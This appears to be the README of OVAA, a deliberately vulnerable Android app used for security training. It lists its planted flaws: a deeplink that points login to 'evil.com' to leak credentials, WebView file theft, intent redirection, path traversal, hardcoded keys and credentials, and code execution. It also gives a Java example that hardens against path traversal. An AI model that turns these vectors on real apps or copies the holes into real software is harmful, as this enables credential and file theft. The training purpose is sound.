## Description
OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities.
## List of vulnerabilities
This section only includes the list of vulnerabilities, without a detailed description or proof of concept. Examples from OVAA will receive detailed examination and analysis on our blog.
- Installation of an arbitrary `login_url` via deeplink `oversecured://ovaa/login?url=http://evil.com/`. Leads to the user's user name and password being leaked when they log in.
- Obtaining access to arbitrary content providers (not exported, but with the attribute `android:grantUriPermissions="true"`) via deeplink `oversecured://ovaa/grant_uri_permissions`. The attacker's app needs to process `oversecured.ovaa.action.GRANT_PERMISSIONS` and pass an intent to `setResult(code, intent)` with flags such as `Intent.FLAG_GRANT_READ_URI_PERMISSION` and the URI of the content provider.
- Vulnerable host validation when processing deeplink `oversecured://ovaa/webview?url=...`.
- Opening arbitrary URLs via deeplink `oversecured://ovaa/webview?url=http://evilexample.com`. An attacker can use the vulnerable WebView setting `WebSettings.setAllowFileAccessFromFileURLs(true)` in the `WebViewActivity.java` file to steal arbitrary files by sending them XHR requests and obtaining their content.
- Access to arbitrary activities and acquiring access to arbitrary content providers in `LoginActivity` by supplying an arbitrary Intent object to `redirect_intent`.
- Theft of arbitrary files in `MainActivity` by intercepting an activity launch from `Intent.ACTION_PICK` and passing the URI to any file as data.
- Insecure broadcast to `MainActivity` containing credentials. The attacker can register a broadcast receiver with action `oversecured.ovaa.action.UNPROTECTED_CREDENTIALS_DATA` and obtain the user's data.
- Insecure activity launch in `MainActivity` with action `oversecured.ovaa.action.WEBVIEW`, containing the user's encrypted data in the query parameter `token`.
- Deletion of arbitrary files via the insecure `DeleteFilesSerializable` deserialization object.
- Memory corruption via the `MemoryCorruptionParcelable` object.
- Memory corruption via the `MemoryCorruptionSerializable` object.
- Obtaining read/write access to arbitrary files in `TheftOverwriteProvider` via path traversal in the value `uri.getLastPathSegment()`.
- Obtaining access to app logs via `InsecureLoggerService`. Leak of credentials in `LoginActivity`: `Log.d("ovaa", "Processing " + loginData)`.
- Use of a hardcoded AES key in `WeakCrypto`.
- Arbitrary code execution in `OversecuredApplication` by launching code from third-party apps with no security checks.
- Use of a very wide file-sharing declaration for the `oversecured.ovaa.fileprovider` content provider in the `root` entry.
- Hardcoded credentials to a dev environment endpoint in `strings.xml` in the `test_url` entry.
- Arbitrary code execution via a DEX library located in a world-readable/writable directory.
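The `TheftOverwriteProvider` item above rests on `Uri.getLastPathSegment()` returning the segment already percent-decoded, so a file name built from it can contain `../`. The following is an added example, not OVAA's code: a hypothetical `SafeSegmentResolver` (class and method names are assumptions) that shows the unsafe join beside a hardened resolver which canonicalizes the path and requires it to stay a direct child of the provider's directory. It is plain Java so it also runs outside Android; `URLDecoder` stands in for the decoding the Android `Uri` class performs.

```java
import java.io.File;
import java.io.IOException;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

// Hypothetical hardening (not OVAA's code) for a provider that builds a file path
// from the last segment of a content:// URI. Uri.getLastPathSegment() returns the
// segment already percent-decoded, so "..%2F" arrives as "../" in the file name.
public final class SafeSegmentResolver {
    private final File baseDir;

    public SafeSegmentResolver(File baseDir) throws IOException {
        this.baseDir = baseDir.getCanonicalFile(); // canonical base for the containment check
    }

    // Vulnerable pattern: the decoded segment is joined to the base directory as-is.
    public File resolveUnsafe(String lastPathSegment) {
        return new File(baseDir, lastPathSegment);
    }

    // Hardened: reject separators and dot names, then require the canonical result
    // to be a direct child of the base directory (this also catches symlink escapes).
    public File resolveSafe(String lastPathSegment) throws IOException {
        if (lastPathSegment == null || lastPathSegment.isEmpty()
                || lastPathSegment.contains("/") || lastPathSegment.contains("\\")
                || lastPathSegment.equals(".") || lastPathSegment.equals("..")) {
            throw new IOException("invalid file name: " + lastPathSegment);
        }
        File candidate = new File(baseDir, lastPathSegment).getCanonicalFile();
        if (!baseDir.equals(candidate.getParentFile())) {
            throw new IOException("name escapes provider directory: " + lastPathSegment);
        }
        return candidate;
    }

    public static void main(String[] args) throws Exception {
        SafeSegmentResolver r = new SafeSegmentResolver(
                new File(System.getProperty("java.io.tmpdir"), "provider-files"));
        // Constructed input: URLDecoder stands in for the decoding getLastPathSegment() does.
        String decoded = URLDecoder.decode("..%2F..%2Foutside.txt", StandardCharsets.UTF_8);
        System.out.println("unsafe resolves to " + r.resolveUnsafe(decoded).getCanonicalPath());
        try {
            r.resolveSafe(decoded);
        } catch (IOException e) {
            System.out.println("safe rejected: " + e.getMessage());
        }
        System.out.println("safe accepts " + r.resolveSafe("report.txt"));
    }
}
```

In a real `ContentProvider.openFile()` the same check would run on `uri.getLastPathSegment()` before the file is opened, and the rejection would be surfaced as a `FileNotFoundException`.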
Licensed under the Simplified BSD License
Copyright (c) 2020, Oversecured Inc